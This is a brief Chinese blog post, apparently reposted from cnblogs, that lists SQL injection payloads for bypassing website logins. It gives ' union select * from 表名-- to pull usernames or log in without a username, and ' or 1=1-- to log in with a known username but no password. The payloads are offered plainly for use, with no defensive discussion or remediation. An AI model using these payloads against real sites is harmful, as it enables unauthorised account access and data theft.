码迷,mamicode.com
首页 > 数据库 > 详细

sql注入

时间:2016-11-27 16:35:27      阅读:179      评论:0      收藏:0      [点我收藏+]

标签:密码   用户   rom   nbsp   sel   语句   网站   select   union   

对于用户名与密码分开验证的网站:

‘ union select * from 表名-- //可查到用户名

数据库的任意密码。

对于用户名与密码在一条SQL语句的网站:

知道用户名,不知道密码   ,用户名:xxx   密码:‘ or 1=1-- key

不知道用户名,知道密码   ,用户名:‘ union select * from 表名--    密码:任意数

sql注入

标签:密码   用户   rom   nbsp   sel   语句   网站   select   union   

原文地址:http://www.cnblogs.com/98-bky/p/6106540.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!